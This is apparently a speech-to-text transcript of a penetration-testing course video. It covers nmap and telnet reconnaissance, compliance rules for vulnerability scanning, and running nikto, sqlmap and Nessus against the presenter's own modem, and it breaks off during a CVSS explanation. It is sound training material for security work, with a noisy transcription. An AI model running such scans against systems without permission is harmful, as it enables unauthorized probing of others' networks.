by default telnet uses Port 23 obviously it's not enabled anymore it's a dangerous protocol but I'm going to connect to Port 80 and that's where we we could see here that that is where the HTTP um protocol is okay so Escape character is and connected so I can see it here that I was able to connect not only to that server but to that server's port 80. now if I'm connected to Port 80 whatever I do here I have to speak http for example HTTP is Works using some actions what they call actions or operations

let's use the get operation okay so HTTP and I got that response well bad request because I didn't authenticate I would have to know how to authenticate using the HTTP protocol language which I don't especially because this performs hashes it's an authentication program but I can see the HTTP result here what does that tell me okay let's take a look at what we have here we are gathering more information about this HTTP server so that's why you should know how to use telnet because you can not only check whether that port is open but you

can connect you can uh establish a communication and you can even gather more information now you can see here that our nmap is still running so I'm going to fast forward okay so finally after a very long period of time our scan is done now the reason why it took such a long time is because UDP scan can be very tough because it's not connection oriented so it's when we run a UDP scan trying to identify this service and version it can be very difficult okay so here's the result I have ports 53 53 UDP

open 49 181 UDP although it's listed but it shows close that's because it's it wasn't able to identify that service now again it's not connection oriented and that's the service that it was capable of identifying on Port 5353 so we saw here so many different options that we have available when using nmap a bunch of stuff that we can use together we also have to know how to use telnet now another tool that we're going to look at in another opportunity in a following module but it's also very important to know that you have this

tool actually two tools available are Wireshark and TCP dump basically TCP dump Wireshark is a graphical version of TCP dump now what does these two tools do and they can be used to gather information to perform reconnaissance information gathering even enumeration well these two tools they are nothing more than packet scanners or sniffers packet sneakers what they do is they will try to gather the packets fetch the packets that are flowing through your network interface so the interface will is always receiving packets what these tools are going to do are is they are actually going

to catch that those packets read them open them for you and show you their content so there is also some additional information that you can gather from these tools so in this video we saw some tools that we have available to technically deploy information gathering I hope you enjoyed this video thank you very much hello Welcome to our fourth module and here we're gonna focus on vulnerability scans now this module will be divided into two different steps two different phases the first one a mostly theoretical phase will focus on on vulnerability management so in vulnerable

vulnerability management we have to understand the steps that are required in order to identify vulnerability and how to manage that vulnerability in case these vulnerabilities are found now before any vulnerability is actually perform vulnerability scan is actually performed we first have to identify whether the client or your company has a regulatory environment which means is it a company that deals with type of data that has to be some has to be compliant with any regulatory organization so for example we previously mentioned a few regular regulatory companies institutions and one that is very well known very

famous is HIPAA so again just to remember HIPAA stands for health insurance portability and accountability Act and we also have another one called Grim leech bliley act now HIPAA is an act a that actually is defines many regulations in regards to health insurance companies and health information whereas the Grim leech blightly act determines some regulations in regards to bank transactions now why is it important to identify if a client's environment is a regulatory environment because these regulatory institutions they may require pen tests to be performed in some situations such as HIPAA and glba they don't

actually specifically say that pen tests must be executed however they regulate how data must be handled well if they regulate how data must be handled therefore there is a pressing need for pen tests to be executed however we must keep in mind that they do not specifically determine their pen tests are to be executed so they do not specifically require vulnerability scams on the other hand there are some other regulatory institutions such as PCI DSS which is the payment card industry data security standard and the federal information security management act that do specifically required vulnerability

scans to be performed they may Define the frequency in which these scans are to be executed or they may only give some um broader information so let's take a look at those so first of all both of them both PCI DSS and fisma they regulate how data must be handled and they regulate periodicity of vulnerability is scans which is to be included in the vulnerability Management program so that is another nomenclature that you're going to see in the CompTIA pen Test Plus exam vulnerability Management program that's a program that the pen tester must build or

the company must specifically have not only the the pen tester have to execute it but the company must have a vulnerability Management program it's a documentation stating dictating how vulnerabilities are supposed to be managed now the PCI DSS states that the vulnerability Management program must include internal and external vulnerability scans there is a difference there may be a difference between frequencies so at least a quarterly scans and after significant changes executed by qualified Personnel what does it mean that means that scans are supposed to be performed pen tests are supposed to be performed every three

months now if a significant vulnerability is found during those pen tests the another scan is supposed to be performed right after addressing those significant vulnerabilities that means that let's say that the first scan is executed in January and no significant vulnerability is found well the second one is supposed to be performed in April if something significant is found in April than the that vulnerability must be addressed as soon as possible and once it's addressed and fixed another scan is supposed to be executed the company is not supposed to wait until in this case in this

example until July to run another scam also it must be executed by qualified personnel high risk vulnerabilities must be addressed and scans must be executed right after action as previously mentioned external scans must be executed by approved scanning vendors or ASV now asvs can be found and must be registered by nist so in the nist website there is a list of approved scanning vendors a company that performs credit card transactions they are they must be compliant to the PCI DSS which means that they must run vulnerability scans with these periodices at as defined here as

shown here and it must be executed by approved scanning vendors now in regards to fisma skins for vulnerabilities in the information system and host hosted applications so and this can be found on in their website so on their website you're gonna see that scans for them it requires scans for vulnerabilities in the information system and hosted application assignment organization defined frequency and are randomly in accordance with organization defined process and when new vulnerabilities potentially affecting the system applications are identified and reported so you can see here that um the the frequency is not defined however

it specifically says that once vulnerabilities are found they must be addressed and another scan must be executed by the way um fisma is a requirement a regulation in regards to security to all government American government institutions foreign Ty scanning tools and techniques that facilitate interpret interoperability among tools and automated parts of the vulnerability management process by using standards for let's say those standards enumerating platforms software flaws and improper configurations so fisma is a big difference because a bit different because it also determines the types of tools that must be used you the pen test must

use tools that will enumerate platforms softer identifies softer flaws and identify improper configurations formatting checklists and tests procedures so not only execute but a checklist of test procedures must follow the the depend test um measuring vulnerability impact so vulnerability the impact of vulnerability must be measured and we are going to do actually discuss that in a following module module 5 actually in which we understand and learn how to measure the impact of a vulnerability based on a number analyzes vulnerabilities scan reports and results from security control assessments so not only execute but also analyze reports

remediates legitimate vulnerabilities assignment organizational defined response times in accordance with an organizational assessment of risk shares information retained from the vulnerability scanning process and security control assessments with organization defined Personnel or roles to help eliminate similar vulnerabilities in our other information systems example systemic weakness or deficiencies so once vulnerabilities are found that must be shared with other departments in order to avoid that from happening in order locations now once you determine if the the pen test is to be executed in in a regulatory environment then you have to Define as a pain tester you have

to Define what to do next okay so you let's say that it is a federal government Institution so that it it's under the regulation defined by fisma okay so you know that there is a periodicity that must be addressed you know that you must um perform another pen test once vulnerabilities found but that's all theoretical now what are you supposed to do before you actually deploy depend test first of all more technically identify targets such as what am I going to scan am I going to scan the entire network am I going to scan softwares

am I going to scan a specific node what am I scanning identify techniques and this is very much related to what has been established by fisma right so you have to identify techniques such as tools types of scans to be executed are going to execute a stealth stem scan are you going to execute a passive scan and active scan what tools am I going to use to what purpose so it's very much related to what fisma has established you also have to define the frequency in case it's not PCI DSS because PCI DSS already establishes

that frequency although you don't the company doesn't have to follow that um that quarterly scan it can perform it let's say every month now the quarterly scan defined by PCI DSS that is the longest window that can be uh that the company can stay without running the scan but you can the company can shorten that window if not if it's not PCI DSS and the company wants to Define um its policy its vulnerability scan a policy or the vulnerability management policy to a specific frequency it can and it should now you must remember you must

remember as a pen tester that everything must be described in this statement of work the pen tester cannot determine anything by itself without describing it and documenting that uh that procedure now once the vulnerability management policy has been established the company along with the pen tester must also establish the workflow obviously this is going to be addressed by the company along with the pen tester so that's why they must do it and together so first of all testing is to be executed well did it detect anything if there is any detection that requires remediation then

it must be remediated once those vulnerabilities are fixed or at least the company and the pen tester believe that they've been fixed testing must be executed once again now well uh one detail I mentioned that the company and the pen tester determined that those vulnerabilities have been fixed it's only the company not the pen tester so the pen tester does the testing the pen tester does the detection writes the report and sends the report shows the report to the responsible person or or the responsible staff the company will be responsible for remediating those flaws fixing

those flaws once they're fixed then they will call the pen tester once again to start it all over run the tests and detection once again so that's how vulnerability management must be executed in general and you must remember that the the company have has to identify whether it's got to be regulatory compliant with any of those institutions and adjust their vulnerability management according to that compliance in our next video we're gonna move to a more technical implementation so we're actually going to see how to execute vulnerability scams using a software called nessus I hope you

enjoyed this class thank you very much hello welcome to the second video of our fourth module module four where we're starting to analyze vulnerabilities so first we discussed vulnerability management so which is a phase where some theoretical actions must be planned now we're going to jump into the actual vulnerability scanning task and to do this we're gonna see three different tools so there are different ways of scanning for vulnerabilities you can search for for example um SQL vulnerabilities or try to find vulnerabilities in databases you can try to find vulnerabilities in web applications in a

standalone applications client server applications so all different types of even operating systems so all different kinds of resources may have vulnerabilities that is why you have such a broad number of tools in order to scan for vulnerabilities so we're gonna take a brief look at two specific tools one is nicto so nickto and we write it this way is a tool that we use to scan for web applications vulnerabilities it can be a vulnerability in the web application in the website for example or also in the server the web server but it's focused on the

HTTP and https protocols then we're going to take a look at another tool that is focused on finding vulnerabilities in databases specifically in SQL databases in relational databases which is the SQL map tool and lastly but not less important or probably most important is the nasus tool now we must keep in mind that there are a like I said there is a very broad number of tools to do the very same thing it depends on which ones you find more interesting or more suitable to your scenario okay so for example let's say that you don't

want to use NASA's because NASA's has different versions and to use NASA's in a productive environment you have to purchase the their Enterprise one of their Enterprise Solutions and they have different solutions um okay so you're looking for an open source and free vulnerability scanner okay so you can try openvas open Vas that's another very good solution so it will very depending on your your needs okay okay so first let's start with nikto and I have my kala Linux instance running here Kali Linux already comes in case you installed it with a graphical environment at

least it already comes with nicto so here's what I'm going to do I'm going to run nickto against my modem okay so the reason why I'm going to run it against my modem is because I don't want to run it against a productive web server because of well many reasons as you are aware by now you should only run any of these tools pen testing tools against servers or devices that the person that or the company that is responsible for those devices are aware of your actions so you cannot randomly pick a server that is

publicly available and do it well technically speaking you can but you can get into in trouble if you do that so please make sure that whenever you're using these tools to learn create your own environment use devices that you control or at least make sure that the person or the company that manages those devices are aware of your tests okay so as as you can see the simplest way to use nikto is actually very simple so simply use nikto space Dash host space the um the web server that you have in this case my modem

has IP address 10.0.2.2 I run it and then it will start to scan that web application and web server okay right off the bat we can see some very important stuff here it's just a modem it's a residential modem so obviously it doesn't come the the their their concern while manufacturing these these residential modems is not security they're not very much concerned about security so obviously we're gonna find many um flaws or at least minor vulnerabilities here that should be addressed okay so it's gonna find a bunch I'm not gonna go through all of them

I recommend you to go through everything that you see when you run your own but let's just briefly uh go through some of these ones here first of all we can see that it's so that's my target IP that's the host name there is no host name that's the port and when it started now then it will show the version it will try to enumerate the version of the web server okay so it's running a Apache 2.4.41 right off the bat that's one problem right there and when we're we're running assets we're actually going to

see a full report about this okay so um Apache versions should be should be higher than 2.4.46 the anti-click jacking x-frame options header is not present it should be the cross-site scripting protection xss protection header is not defined this header can hint to the user agent to protect against some forms of cross-site scripting so basically it's saying hey this is not defined but it should be um another one the X content type options header is not set this could allow the user agent which is the attacker to render the content of the site in a

different fashion to the mime type which means that the attacker can gather more content than that that is supposed to to be made available the Apache mod negotiation is enabled with multi views which allows attackers to easily Brute Force file names that is a problem there and there is a link there that will give you more information about that the following alternatives for index were found so you can see multiple languages available index files with different languages available multiple index files found there is a problem why is there a problem well if you have two

index files probably just one index file is supposed to be made available to be available so the other one shouldn't exist if it if it exists it can give more information to the attacker information that is not supposed to be available keep that in mind as a security analyst standpoint from a security analyst standpoint only information that is supposed to be available should be available no more than that and then we have so many other um uh so so much more debug available here now out of 7889 requests as you can see right here zero

errors and 10 items reported on remote host so there was no error but there were 10 items reported what does that mean it means that the the server and the the web applications that that it runs doesn't have a critical vulnerability but there are some reports or report items that should be addressed then it can ask you for more uh for your interaction okay so in this case it's asking portions of this server's headers as you can see are not in the nickto216 database or newer than the no string the the noun string would you

like to submit this information to cert.net for a nickto update so basically what it's saying is hey there is something here that could be addressed but there is no plugins in this at least in these versions database that could address this problem or this anomaly would you like to report it because if you report it then nicto guys they could include those plugins into their database so no I don't want to do that and we are done okay so that's Neato there is a bunch of other options that you can use along with nikto I'm

not gonna go through all those options but it's always interesting and important to actually know that you can enhance the way that you use a tool okay so for example let's say that you are checking a web application that connects to a database right you can specify some database specific metrics such as DB check and there is so many others here for example let's say that you you know the database name or you want to try to guess the database name there are options here that will help you as you can see that will help

you address that database okay so it's always important to take a look at the options that you have available which may improve the not only your pen testing task but also the performance of your pen testing task keep in mind this can be a very very long task the execution may take a very long time I ran it against just a modem if you run it against a production environment production web application with that is calling other websites and other applications this can take a very very long time okay now the SQL map tool basically

that's how you use the SQL map tool uh this is I I won't get a successful execution against my modem because actually it doesn't have a a SQL database but if you have a SQL database and you want to take a look at the output this is the simplest way to run it SQL map Dash U to specify the URL of the of your target okay now in many situations as you can see in this output here it may say hey you're trying to scan this website here or this database management management system through a

web application right so if it's a web application you're supposed to inform a parameter that we can use in order to connect to the database and this may be a little bit confusing right now but we're going to discuss this in details when we get to the web application vulnerability module we're going to have a module that will focus specifically on for example SQL SQL injections okay so when you're directly connecting to the database you can use SQL map and say hey SQL map connect to that that dbms database management system and it will do

it when you're connecting to a website a web application that connects to the database then you have to inform put up parameters that will be used in order to connect to that database through the web application if you try for example this option right here and it doesn't work but you know that website has forms this is what you can do okay so SQL map dash dash forms Dash U and the the target it will randomly generate information to fulfill those forms and by fulfilling those forms it will pass the parameters that are required to

connect to the database not directly through the web application so this is just another way of running it again it's not the case my modem doesn't have doesn't have a SQL dbms okay now moving forward we also have another application that is very very interesting and very powerful which is NASA's So currently nasus is the most adopted well-known vulnerability scanner in the market now how does NASA's work basically what it does is to actually perform attacks and how does it perform those attacks by using a bunch of different plugins and you're gonna see you're going

to have an idea of how many plugins we have so basically a plugin is a script that will perform an attack in order to check whether that vulnerability is available or not so you can have a plugin that will try to detect a specific vulnerability you can have a plugin that will detect many different vulnerabilities okay so that's basically how it works it's a client server application it's a web application that you you have two different options one is you run it as a web application or you run it as a network service if you

run it as a network service you're gonna have to have the network client in order to connect to the nasus server and issue a vulnerability scan or a network scan so it's a lot easier to just just run it as a web application because then you just have to have access to a browser and from that browser it doesn't matter where you are from that browser you can connect to your NASA's web application and configure your scan and also start the scan execute the scan so NASA's is a tool designed by tenable and that's their

website tenable.com if you come here you're gonna see products and nowadays they have so many different products okay and this is the one that we're gonna look at nasus I'm going to click here now once again I strongly recommend you to try it okay not only watch the video but also do it you're gonna understand it a lot better and you're gonna learn a lot more by the way nasus is a tool that is supposed to that that is covered by the CompTIA pentas plus exam you're certainly going to see it there also this is

a tool that will be used by US once again in our next module module five in order to interpret analyze vulnerabilities okay so here you can see some different versions of nasus and this is the one that we're going to download NASA's Essentials so obviously it has its limitations okay idea for educators students and individuals starting their careers in cyber security so that's the one you're gonna click on download it's gonna ask for your um first name last name and email actually this is only you're only gonna use this to receive an email with the

activation code as you can see right here you need an activation activation code in order to run nasus even NASA's Essentials which is free okay so once you fill this out you click register it will take you to a web page that will give you different options to download nasas you're gonna pick select the the version according to your uh distribution okay so let's say that you have a Kali Linux as I have right here you're gonna see a a version of nessus for Kali Linux Okay so you download it here when I downloaded it

it went to my downloads folder inside my home profile my home directory okay you're gonna get the activation code in your email now here all you have to do is to do a dpkg in case you're running Kylie Linux Debian Ubuntu these Debian like distributions Dash I downloads and then your um your the file that you downloaded the dot dab file the nasa.deb file okay I already have it it's a very quick process okay once it's done you have to start NASA's service and once again it will depend on your distribution if you're using um

catalinux more recent sent OS distributions Debian distributions you're going to do pseudo system control start nessus D okay it will ask for your because you're using sudo you're running it as an administrator user so it will it will ask for your password okay if you want so no error here if you want to make sure that nasus is now running you can do PS auxiliary or a u x pipe grab nessus and there it is now something interesting that I want you to see so you can get an idea of how many plugins we have

I'm going to do sudo um in the opt nurses directory and there you go so we have more than seven gig of data in the NASA's directory most of this amount of data are NASA's plugins now remember a plugin is a script a script is nothing more than one small text file well it can be a binary file but it's it's a very small file usually it doesn't even have a MAG right it just maybe not even a k very small files so you can get an idea of how many files you have there okay

once you have masses installed and running you're gonna go back to your browser and you're gonna access https you have to specify https it's not HTTP okay so https column dash dash slash slash you're a machine name or you can use localhost if you want that's also fine column eight eight three four that's the port that nasus runs its web application okay once you do it the first time that you run nasus it will ask some simple questions first of all it was it will ask for diversion of nurses that are willing to run because

although you downloaded NASA's Essentials when you run it it will ask you hey do you want to let's say do you want to run NASA's professional if you do we're going to load more plugins okay because the only difference between all these different NASA's versions basically it's the the access to additional resources and additional plugins obviously if you pick a different version different from its Essentials you're gonna have to pay for the activation code okay once you click okay I want to use NASA's Essentials it will once again ask for your first name last name

and email okay but you already have your activation code so you're gonna see a button written skip so you can click Skip and then it will take you to another page that will ask for your activation code you insert the activation code there you continue and then it will start to download and compile the plugins now this is a very very important uh information okay to compile to download and compile and then load all those plugins nasus requires a bunch of resources Ram CPU and storage as you saw so storage almost 8 gig and RAM

it also requires a bunch of RAM so why is this information important because nasus doesn't debug um problems while you're compiling those plugins so let's say that you run out of ram it will start using the swap memory but it will go so slow it will start running so slow that nasus will go back and start loading compiling and loading the plugins once again from scratch from the beginning and it will keep doing that so let's say that it starts over go all the way to half of the plugins there is not enough resources it

goes back to the beginning and it just keeps doing that in a loop and you're like okay why is it taking so long so that's why make sure that your machine has at least four gig of RAM at least four Giga frame and more than um more than 10 gig of storage available okay once the the plugins have been compiled and loaded it will ask for your user and you can Define any username with any password I have here nasus with password nasus and you sign in okay good now the first time that you log

in first of all it will create this automatically it will automatically create this scan called my host Discovery scan so that's a feature that nasus has okay it will run a host Discovery in your network it will try to find other hosts of course the the own host that is running the own machine that is running nasus and also other hosts within that same network okay but it will basically just do a simplistic scan against those hosts and what you actually should do is create your own scan as I did over here okay and this

is a scan that I executed already but before we take a look at the result of that scan let's see how we can actually create those scans okay so the first time that you face nasus that you log into nasus this is the page that you're going to see my scans probably it's it will either have my host Discovery skin here or it will be empty okay and then you have to configure how you want to run the NASA's scans now how can you do it you have a few options here okay first of all

if you go here to policies and this is what is most important okay in policies you have templates okay what are these templates templates are different types of scans that have been um previously created to facilitate our life so let's say that you want to run a scan but you you're not two options you're not um absolutely positive about what you want to do or you know for a fact that you want to run a very specific scan okay so if you're not positive about what you want to do you can start by running a

basic Network scan okay just scan your network okay it's different from a host Discovery host Discovery will only as it says here a simple scan to discover live hosts and open ports but there is no vulnerability scan if you want to run a basic vulnerability scan you can pick this option here a full system scan suitable for any host so it's a generic vulnerability scan if you want to run a very specific scan then you have all these different options here so molars can scan for malware on Windows and Unix systems mobile devices can access

mobile devices via Microsoft Exchange or an MDM web application tests this is a very resourceful and useful credentialed patch audit okay so there is a concept called credentialed scan and non-credentialed or uncredentialed scan okay what is the difference uncredentialed scan is a is a scan that you're going to run when you don't have authentication credentials information okay so usually in a black box um methodology in a black box pen test you're gonna run a uncredentialed scan unless during your scans you are able to find some credentials if you have access to credentials let's say that

you're running a white box scan okay so your client or your boss provided you with some credentials then you're gonna run a credentialed scan okay so in this case you can run a credentialed patch audit so authenticate your hosts and enumerate missing updates so keep in mind this is not actually a attempt to exploit vulnerabilities so you are basically using the authentication the credentials that you have to enumerate missing updates so basically you're using user and password to be allowed to connect to the services or applications to check whether those applications need to be updated

bedblock badlock detection shell shock detection drone detection security by Intel EMT security bypass Shadow Brokers scan Spectra and meltdown wannacry ransomware somewhere so what is what do we have in common for all of these detections and ransomwares around here so from this one all the way down to this one remote and local checks for cve 2016-2118 um cve 2014 6271 so what specifically is this this CV so CV stands for common vulnerabilities and exposures every time that a vulnerability is detected ideally if it's a new vulnerability if it's a new vulnerability that no one has

ever seen and has not been reported you're supposed to report it that vulnerability will be addressed if it if it is an actual vulnerability a cve a specific number a part number will be assigned to that vulnerability why because we want to have a identification a unique identification for each vulnerability so that companies that design softwares they know what type of vulnerability should be addressed so for example if you run the bash shell shock detection which performs remote and local checks for those two different CVS you know that it is a very specific vulnerability that

is being addressed what are what are those two vulnerabilities those are the vulnerabilities associated with The Bash shell shock uh attack okay and in our next module module five we're actually going to see how to analyze these CVS okay now down here as we previously mentioned in several opportunities you also have compliance okay so you have scans to make your system to check if your system is compliant or your clients systems and devices are compliant with some compliance acts okay so audit Cloud infrastructure internal PCI network scan now perform an internal PCI DSS vulnerability scan

according to PCI DSS Act 11.2.1 okay and some others here now here we have the PCI quarterly external scan approved for quarterly external scan as required by PCI which is very very helpful because um but basically to perform the PCI quarterly externally scan to your client in case you're being hired by your client basically this is all you have to do in regards to the quarterly external scan okay now in order to use these you need an upgrade you cannot use NASA's Essentials okay but what if I don't want to use any of these I

want to customize my own scan okay very good so what you can do is go here to Advanced scan configure scan without using any recommendations so I'm gonna go there okay now you've been taken to a new scan okay so from the plugin oh I'm sorry from policies you've been taken to your scans to create a new scan okay and you have so many different options here first of all settings you have different types of settings that you can configure here some basic information you can name it actually you have to name your scan you

can just give a text description where in which folder you want to store it and you can list your targets as you can see it could be a specific IP if you have more than one IP address you can use comma to separate those IP addresses you can use the cidr notation uh you can use domain names you can use a range so for example I believe you can see ranging from 192 168 1 1-192 or if you have a file listing the IP addresses and it must be uh One Source IP domain name Network

range whatever one per line in a text file you can add that text file here um you can schedule this execution okay it's not enabled but you can notifications so in once it's done uh you want to every time the execution the the scan is done you want to notify uh someone maybe yourself so you can Define it here okay um and many other uh setups that you can Define here okay now also very important if some types of scans require credentials then you can define those here for example if it's uh during a host

scan in case it's a Windows okay so you can Define your domain name and username and password here if it's a SSH authentication if there it's a host with SNMP version 3 enabled you can also Define it here obviously you have to have these credentials but the idea here is okay I do have the credentials I want to connect using those protocols and authenticate in order to retrieve information right so once again it depends whether you're using a white box you're performing a white box pen test or in case you're performing a black box pen

test you have to have acquired those credentials previously okay and now oh I'm sorry so you also have other categories for example if you want to scan a host that has database and you have credentials to those to that dbms then you can inform it here okay so what is the database type okay it's my SQL it's Oracle what is it now moving to plugins when you go to your personalized customized scan all plugins will be enabled now you should not do it because first of all it will take a very very long time and

second you're going to run so many plugins unnecessary plugins right so for example the first one that we see here is AIX local Security checks well if our system is not AIX why would you use it why would you run it so I'm going to click here it's enabled I'm going to click here on disabled and and disable it okay now automatically you can see that the all those plugins associated with that family of plugins have been disabled now observe here that we have the plugging families here you see how many families we have a

family uh is composed of a set of plugins for example the AIX local Security checks family has 11 377 plugins if we go here and click on a specific plugin you're gonna see a description of that plugin so what does this AIX 5.1 ay19744 plug in this synopsis the remote host is missing a vendor supplied security patch description it says what it does how to solve that problem and more information about that plugin in the risk factor which we're going to discuss in our next module is high okay so you can let's say that you

have this family here enabled you can disable some specific plugins and have others leave others enabled that's not and it's changed to mixed because we have some that are disabled others that are enabled okay but I'm going to disable so you should go here and enable or disable accordingly okay depending on your targets now once it's done you click on Save okay I already have my own one I previously created one here called CompTIA pentas plus vulnerability scan okay and I executed it so I created one that um detects that scans to hosts as you

can see here my own Kali Linux machine and my modem okay so 127.0.0.1 that's the localhost and 10.0.2.2 that's my modem okay um so I'm gonna go back here in order to Launch a scan you click on the scan that you created and then you're gonna see here launch okay it can take a while it can be quick it depends on the number of plugins okay every time you run it you're gonna see the result so my history here um there it is it's been canceled um it was ran executed today last modified today and

let's see what we were able to find oh I guess I clicked on the wrong one I'm sorry so it's this one right here okay um so 127.001 look one medium Factor vulnerability 34 are just info okay now my modem 10.0.0 10.0.2.2 one high one medium one low 28 info let's take a look at this so let's go here to vulnerabilities okay and there is one here that is mixed what does that mean it means that two vulnerabilities associate associated with the Apache HTTP D server web server were found let's take a look at those

okay so one is medium the other one is high what is the problem of that vulnerability or at least its name Apache 2.4.x lower than 2.4.46 that's high and another one is lower than 2.4.42 well that's because the Apache version that is okay so let's go there click on hi so the Apache version that is running is below its version is below 2.4.42 because it's 2.4.41 okay now what's the problem the version of Apache HTTP installed on the remote host is prior to 2.4.44 it is therefore affected by multiple vulnerabilities as referenced in the 2.4.46

advisory Apache ttdb server 2.4.32 to 2.4.44 mod proxy uws GI info disclosure and possible rce which is associated with this common vulnerability in exposures part number right here we are going to in the next module we're going to learn how to analyze this okay so there is a description here and basically if you scroll down and obviously you have a bunch of other information here explaining how critical this is and then you have a solution right here what do I do you upgrade to Apache version.2.4.44 or later okay so installed version 2.4.41 fixed version 2.4.46.

okay we also have a bunch of other information here on the right hand side okay some so some more details about my plugin the plugin that actually detected that vulnerability um and risk information this is in our next module basically we'll be focusing on understanding this okay so risk factor High who determines if it's info low medium or high okay okay so it's high because of the CVSs base score which is 9.8 okay what is the range of that score okay now what is the CVSs Vector here we have a bunch of information each of

these data uh between these slashes are specific information we're also going to learn that okay some additional vulnerability information right there and link to the CV or CVS associated with that vulnerability are down here so this is how you run NASA's that's how you run configure and launch vulnerability vulnerability scans once again in our next module we're going to focus on understanding interpreting these data right here I hope you enjoyed this class thank you very much hello welcome to module 5 and our focus in this module is going to be analyzing vulnerability reports so we

saw in our previous module in module 4 we saw how to run different types of vulnerability scans now the tasks or tasks of a pen testers is to not only run vulnerability scans but also to analyze the result you see there are some steps that must be followed or at least executed by a pen tester and out of those steps we have run a vulnerability scan but not only that we have to as pen testers we have to also verify whether those vulnerabilities actually exist or not they if they are actually if they actually work

what does that mean this means that once we find a vulnerability of course there are some vulnerabilities that they are very rough they are dangerous so just by knowing that they exist there's nothing else that you need to do in regards to it but there are other vulnerabilities that they must be exploited so for example let's say that you are pen testing a client's Network and you found out that they have the the client has a number of Windows workstations well usually a Windows workstation is not that important in regards to the data that it

contains however this can be an entry point to other spots other locations or other devices of your network this means that if you find a specific specific vulnerability in a Windows workstation that you can leverage to gain control to it and from there get access to other devices or simply to sniff data that is being transmitted through that Network then you're not only going to see that that vulnerability exists but you also have to make use of that vulnerability so this leads us to this this module here analyzing the report that's one um one reason

why you have to do it the other reason which is more important on the client side or on on your boss side which is analyzing out of all the vulnerabilities that were encountered that were found in case vulnerable vulnerabilities exist let's say that there are maybe 20 25 vulnerabilities in which order is the I.T staff going to assess those vulnerabilities or fix those vulnerabilities there must be a schedule and that schedule must go along with the criticality of those vulnerabilities so that is why it's so important to analyze the vulnerabilities and that is why we

have what is called the CVSs and we're going to discuss that the CVSs base score it helps us identify the vulnerabilities that are more critical than or others okay so a vulnerability report can give you any obviously it will depend on the vulnerability scan scanner that you're running but in general all of them they may use different names but all of them will have the same information here first of all a summary of the vulnerability just a name for example or a brief description it will also present a detailed description so it's actually telling you

hey this this vulnerability here is critical because of this this and that it can show to you how to fix or at least give you a link with a URL showing you how to solve that problem the output that's been sent by the machine or software that that's being compromised or at least that hosts that that vulnerability so when the for example let's say that we're using nasus when asses runs the scripting attack against a device that that device will respond will reply in some way so here we can see the output sent by that

that that Target now this output is very important important for the plugin to know what's going on and are also for you as a pen tester and your client to know hey why did this plugin actually gave me this result why does it say that it's critical well it was based on some information that it was able to pull from that device references links to give you more information about that if it's just information or if it's an actual vulnerability it will give you references to those vulnerabilities so if it's a common vulnerabilities and exposures

um vulnerability it will the cve it will give you a link to that CV and it may give you some other links and most importantly at least in uh in our side since we are now taking the side of a client we have to observe risk and vulnerability information and this is going to be our focus in this module okay how to analyze the information that the vulnerability scanner shows to us in regards to how risky and how vulnerable our our system is okay so this was retrieved from the previous module right so if you

remember we I actually executed a scan against my own machine and also my modem and my molding modem was running an Apache version 2.4.41 and we remember that it was a high vulnerability that was identified by nasus right and this was the output so all those sections that I mentioned over here right we can see over here so here's the summary okay this is the the some information with more details solution we can see that the solution here is actually pretty easy right so just upgrade to Apache version 2.4.44 or later which actually is not

quite the solution because um well in this case it is but we also had an other vulnerability which was a medium and it was saying that hey you have to update it upgrade it to 2.4.42 but if you upgrade it to 2.4.42 then you'd still have this vulnerability here so that is something that may occur you have more than one alert associated with the same problem with the same vulnerability okay and it's also very important to take a look here and observe that in the description it mentions these cves right we can see here that

Apache HTTP server 2.4.32 to this version here there is a specific module called mod proxy uwsgi information disclosure uh is possible and it can be exploited by the because of this vulnerability here that is described by this cve now also another existing vulnerability which is exists in Apache server 2.4.20 to 2.4.43 when trace or debug was enabled for HTTP 2 version 2 module on certain traffic Edge patterns login statements were made on the wrong connections causing and concurrent use of memory pools configuring the log level of mod HTTP 2 above info will mitigate this vulnerability

for unpatched servers so this vulnerability is also described here and then we see another one here described by another cve okay some other information that we also saw was the plugin details so it says here what's the severity identified by the successful execution of this Plugin or exploitation of this vulnerability so it's high that's the ID the plugin ID okay that's the plugin version type remote which means that this plugin can remotely exploit that vulnerability and we're gonna see that this is actually very critical okay so this information is critical um we're gonna see that

when we analyze the CVSs base score family so web servers that's in case you remember from last class from our last module we saw that we have the family the plug-in families okay so this plugin belongs to the web server's family so that's when it's been published and that's when it's been modified okay some other information we already saw that so the solution is to upgrade the Apache server version to 2.4.44 or later that's the output so the server actually sent it's um hello it sent its flag to the plugin so that's how the plugin

was able to capture the version so the installed version is 2.4.41 the fixed version is 2.4.46 okay the port that runs the service is port 80. in that host 10.0.2.2 now reference information as I mentioned those are the cves that describe these vulnerabilities okay so keep that in mind we have only one plugin here flagging alerts but this plugin does not only exploit does not only identify one vulnerability but three vulnerabilities all of these vulnerabilities are associated with the same problem which is version you have to upgrade Apache in this case but they are different

vulnerabilities and this is what we'll be focusing on in this class so risk information and vulnerability information okay so here mostly in Risk information you can see many lines here right so risk factor it says that this vulnerability or vulnerabilities are high okay based on what that's what we're going to discuss here we can see here that the CVS version 3 base score is 9.8 the CVS V3 Vector is and then you see there all those letters we're going to understand that as well um we don't have to worry about the temporal Vector so let's

just go down there and take a look at this CVS base score which is 7.5 now why do we see two CVS base scores two different CVS basis scores here well that's because the CV we have different versions of the CVS s base score okay so the one at the bottom right here if we go down and take a look at it here we can see that this is this base score here is associated with CVSs version 2 whereas this CVS basis score here is associated with CVS S3 okay and once again we will also

understand what the CVSs Vector is actually it's the CVSs Vector that will point out to our base score our CVSs base score okay now in which base score or which CVSs version should I rely on well it varies it may vary so um it will actually depend on the plugin on the software on the vulnerability scanner that you're running okay so for example we can see here that nasus was able to give you the base score for both versions version 3 and version 2. well not quite uh it wasn't quite um nurses that was able

to do it but actually the the plugin was able to pull the information used by nasus to generate that classification now what is most importantly here is that it doesn't matter whether it's CVSs 2 or 3 we can see that the risk factor is high so basically the difference between versions 2 and 3 is the range of that score but they will it doesn't matter which version it is the risk will always falling the same classification for example here we can see that version 2 the base score is 7.5 whereas in three it's 9.8 but

both of them are high now we also have here vulnerability information okay so that's the the the the the the some additional information about the vulnerability itself not about the risk okay now why is this also important why is this section here also important because if it is a vulnerability that there is a known um exploit that you can um that you can use to exploit that vulnerability then it can just show you a text here or even give you a a link you click there and you go directly to a web page that will

allow you to download the exploit file basically you just have to run that exploit obviously there are some exploits that they are fancier so they require some additional knowledge but many many situations exploits are very simple exploit files are very simple to execute to run but that's which is not the case here this is not a simply exploitable vulnerability this is a vulnerability that can give information to the attacker based on the uh uh on the retrieval of data not specifically it's different from a dni of service attack denial of Services of service attacks usually

